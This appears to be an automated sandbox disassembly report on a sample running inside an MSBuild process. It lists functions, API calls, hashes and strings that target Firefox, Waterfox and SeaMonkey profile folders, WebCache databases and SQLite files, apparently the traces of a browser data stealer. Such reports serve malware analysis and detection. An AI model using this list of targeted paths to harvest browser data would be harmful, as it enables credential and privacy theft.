                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                            • memset.MSVCRT ref: 00403DDA
                                                                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                            • API String ID: 3527940856-11920434
                                                                                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                            Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00403E50
                                                                                                                                            • memset.MSVCRT ref: 00403E65
                                                                                                                                            • memset.MSVCRT ref: 00403E7A
                                                                                                                                            • memset.MSVCRT ref: 00403E8F
                                                                                                                                            • memset.MSVCRT ref: 00403EA4
                                                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                            • memset.MSVCRT ref: 00403F6B
                                                                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                            • API String ID: 3527940856-2068335096
                                                                                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                            Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00403FE1
                                                                                                                                            • memset.MSVCRT ref: 00403FF6
                                                                                                                                            • memset.MSVCRT ref: 0040400B
                                                                                                                                            • memset.MSVCRT ref: 00404020
                                                                                                                                            • memset.MSVCRT ref: 00404035
                                                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                            • memset.MSVCRT ref: 004040FC
                                                                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                            • API String ID: 3527940856-3369679110
                                                                                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                            Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpy
                                                                                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                            • API String ID: 3510742995-2641926074
                                                                                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                            Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                            • memset.MSVCRT ref: 004033B7
                                                                                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                            • String ID: $0.@
                                                                                                                                            • API String ID: 2758756878-1896041820
                                                                                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                            Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2941347001-0
                                                                                                                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                            Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00403C09
                                                                                                                                            • memset.MSVCRT ref: 00403C1E
                                                                                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                            • API String ID: 3249829328-1174173950
                                                                                                                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                            Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040A824
                                                                                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 669240632-0
                                                                                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                            Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • wcschr.MSVCRT ref: 00414458
                                                                                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                            • String ID: "%s"
                                                                                                                                            • API String ID: 1343145685-3297466227
                                                                                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                            Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                            • API String ID: 1714573020-3385500049
                                                                                                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                            Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004087D6
                                                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                            • memset.MSVCRT ref: 00408828
                                                                                                                                            • memset.MSVCRT ref: 00408840
                                                                                                                                            • memset.MSVCRT ref: 00408858
                                                                                                                                            • memset.MSVCRT ref: 00408870
                                                                                                                                            • memset.MSVCRT ref: 00408888
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2911713577-0
                                                                                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                            Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmp
                                                                                                                                            • String ID: @ $SQLite format 3
                                                                                                                                            • API String ID: 1475443563-3708268960
                                                                                                                                            • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                            • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                            Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                            • memset.MSVCRT ref: 00414C87
                                                                                                                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                            Strings
                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                            • API String ID: 2705122986-2036018995
                                                                                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                            Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmpqsort
                                                                                                                                            • String ID: /nosort$/sort
                                                                                                                                            • API String ID: 1579243037-1578091866
                                                                                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                            Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040E60F
                                                                                                                                            • memset.MSVCRT ref: 0040E629
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                            Strings
                                                                                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                            • API String ID: 3354267031-2114579845
                                                                                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
